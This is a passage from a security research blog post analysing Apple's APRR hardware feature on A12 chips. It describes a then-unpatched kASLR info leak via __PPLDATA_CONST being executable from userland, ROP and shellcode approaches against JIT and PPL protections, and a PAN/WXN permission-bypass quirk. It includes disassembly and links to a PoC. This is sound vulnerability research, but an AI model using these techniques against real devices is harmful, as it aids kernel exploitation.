- If you’re confused by the bits coming in from the top right, those are the “Hierarchical Permission Disable” bits (HPD). Basically a page table can already have bits set that say it can never map anything as writeable or so, and then the write bit is stripped out of any entry mapped under it.
Mitigations gone rogue
Remember earlier where I mentioned some people’s speculation that Apple has repurposed the UXN bit, and said that was an interesting way to put it? Time to revisit that. Let’s look at PPL page tables again:
With knowledge of how APRR works, notice anything off? Anything about __PPLDATA_CONST
?
Yep, that permission is not remapped (or remapped onto itself, if you will), which means it’s actually mapped as --x
in EL0! This constitutes a vulnerability that lets you brute-force the kASLR slide by simply installing a mach exception handler and repeatedly jumping to locations within the kernel’s address range. If you get an exception of type 1, it’s unmapped/inaccessible memory, but if you get an exception of type 2, you hit __PPLDATA_CONST
. (Note that you can’t leak data from that page though - you might assume you could, because the exception message contains the faulting instruction. However, that is obtained via copyin
, which refuses to operate on kernel addresses.) PoC is available here and is still a 0day at the time of writing.
Now there is a lot of irony in this:
- Not only did random researchers think the UXN bit got repurposed, but so do Apple engineers apparently!
- This is a vulnerability so fundamental that it is trivial to exploit, takes virtually no time, and is reachable from even the most heavily sandboxed contexts.
-
It affects nothing but the latest chip generation. A11 and earlier are safe, it only exists on A12/A12X. Or, to quote Ian Beer on the matter:
So what can you do to protect yourself?
Use an older device!
[is Britishly outraged] - There isn’t even a reason to put
__PPLDATA_CONST
under APRR! What are you gonna do, make it more readonly than it already is? - This is the peak of mitigation madness. We literally have one mitigation breaking another.
- Apple hardware team appears to be really competent, ehh but the software team…
And this isn’t even the end of the story, but I’ll leave the rest as an exercise to the reader.
Pentesting APRR
Aside from the info leak that presented itself so openly, let’s go back to try and see what protects APRR against a motivated attacker. In the case of JIT, things are pretty simple:
0x188347298 002298f2 movk x0, 0xc110
0x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
0x1883472a4 0000e0f2 movk x0, 0, lsl 48
0x1883472a8 000040f9 ldr x0, [x0]
0x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
0x1883472b0 df3f03d5 isb
0x1883472b4 012298f2 movk x1, 0xc110
0x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
0x1883472bc e101c0f2 movk x1, 0xf, lsl 32
0x1883472c0 0100e0f2 movk x1, 0, lsl 48
0x1883472c4 280040f9 ldr x8, [x1]
0x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
0x1883472cc 1f0109eb cmp x8, x9
0x1883472d0 c1020054 b.ne 0x188347328
After the write to the system register, the commpage address is re-constructed and the value re-loaded, and checked against the value currently in the register. This prevents us from ROP’ing into the middle of the memcpy gadget and changing the register to an arbitrary value. So APRR itself is protected, but in the face of a calling primitive, the memcpy function will still happily put some shellcode in the JIT region for you, no change to the system register needed. And once you have code in the JIT region, the entire model falls apart, as you now can freely change the system register.
As for the kernel side, things are more complex there. I’ll omit the code for brevity, but a lot more cases have to be considered. The PPL entry gadget also has ROP protection, and the exit gadget is on a page that is only executable in privileged mode, so that doesn’t need it. In addition, interrupts as well as panics have to be dealt with in a safe way.
Panics are handled by having a per-CPU struct in __PPLDATA
, which contains a flag saying whether we are currently in PPL or not. That flag gets set by the PPL entry tramp and cleared by the exit routing, and panic
simply calls out to the latter if the flag is set, before continuing down its path.
Interrupts take a similar, albeit more nuanced approach. For a start, __PPLTRAMP
has them disabled, but sets daifset
back to its original value before actually jumping into __PPLTEXT
. Now rather than checking the per-CPU data struct, the exception vectors for EL1 simply check the APRR register itself, and if it matches the privileged value, go through the PPL exit tramp. If it doesn’t though, they still check whether it matches the unprivileged value, and if not, spin. This means that even if you somehow get control of the register, you can’t reasonably set it to any value other than the existing two anyway, since the next exception you take will kill you.
So again APRR itself is safe, but what about PPL? Can we pull the same tricks as with JIT? For the most part, PPL seems to carefully sanitise the input you give it. But then at random, for example when it came to the trust cache, they didn’t bother with that and put all their faith in PAC instead, only to be monumentally let down. Taking a look at the iOS 13 beta kernels though, this appears fixed.
Apart from that, it might be noteworthy that, same as with JIT, any single crack will tear the entire model down. If __PPLDATA
or any single page table can be remapped as non-PPL, or can be written to by other means, via peripherals or the dark arts, then that can immediately be used to extend this capability to the rest of PPL-protected memory. But eh, it’s probably fine, right? ;)
Digging deeper
What XNU does with APRR is… alright I guess, but when we get such an undocumented blackbox feature, it would be outright irresponsible to not go and drive it up to its limits, right?
Again, getting shellcode execution in EL1 is left as an exercise to the reader (be that in skill or patience), but once you do have that, there’s a good bunch of things to test:
- When were these registers actually introduced?
- What do they reset to?
- What are their maximal and minimal values? Can you just set
APRR0_EL1
to0x7777777777777777
and access kernel memory from userland? - Is the 0x8 bit settable in any field? Does it have a function?
- How does HPD affect KTRR?
- What about PAN (SMAP) and WXN?
- Are the permissions accurately reflected by the
AT
instruction? - Can you create otherwise unobtainable permissions, such as write-only?
To answer all of that, I wrote a good bunch of shellcode that will run a number of different tests and dump the results into memory. The code is available here and raw results here.
In summary:
- Registers
6
and7
appeared on the A11, but the core APRR registers0
and1
are present back on the A10 already. (Apple seems to have been planning this for quite a while!) - Unlike virtually any other register, registers
0
and1
reset to their maximum values, which are0x4545010167670101
/0x4455445566666677
respectively. - Every bit can be set to zero, but bits that are zero at reset can never be set to one. This also means the
0x8
bit is never settable. - TTE and HPD bits are processed before anything else. This yields what I call the “input value”.
- The input value is then copied to a “working value”, to which APRR, PAN and WXN are applied. Each of these modifies the working value, but makes decisions based on the input value rather than the working value.
- The
at
instructions do accurately reflect the effective permissions. - It is possible to create write-only memory and such.
Amidst all my test results, something stood out though: weird things happen when you turn on both PAN and WXN. Let’s diff 0xffffffffffffffff-0xffffffffffffffff-PAN-WXN.txt
and 0xfff0fff0fff0fff0-0xfff0fff0fff0fff0-PAN-WXN.txt
, for example:
It’s the first line that’s off here. APRR would dictate that the permissions should be none, yet EL1 can read and write. It appears that, if all of the following are true:
- PAN is enabled
- WXN is enabled
- The access is privileged
- WXN applies
- PAN does not apply
Then the APRR register is not consulted. In addition, for the at
instruction it seems to be enough to have both PAN and WXN enabled to break everything:
For what it’s worth, XNU runs with PAN on and WXN off - but still! How does something like that happen?! Is there some Verilog code passage now where it says =
when it should say &=
? Did I say Apple’s hardware team was really competent? I might have to track back a bit on that… but yet again already we’ve seen one mitigation break another.
Conclusion
APRR is a pretty cool feature, even if parts of it are kinda broke. What I really like about it (besides the fact that it is an efficient and elegant solution to switching privileges) is that it untangles EL1 and EL0 memory permissions, giving you more flexibility than a standard ARMv8 implementation. What I don’t like though is that it has clearly been designed as a lockdown feature, allowing you only to take permissions away rather than freely remap them.
It’s also evident that Apple is really fond of post-exploit mitigations, or just mitigations in general. And on one hand, getting control over the physical address space is a good bit harder now. But on the other hand, Apple’s stacking of mitigations is taking a problematic turn when adding new mitigations actively creates vulnerabilities now.
But at last, we might have gathered enough information to make an educated guess as to what the acronym “APRR” actually stands for. My best guess is “Access Protection ReRouting”.
I hear when Project Zero tries to guess the meaning behind acronyms though, all Apple engineers have to offer is a smug grin, so maybe it’s also just “APple Rick Rolling”.
For typos, feedback, content questions etc, feel free to open a ticket, ping me on Twitter Mastodon or email me (*@*.net
where *
= siguza
).
Till next time, peace out. ;)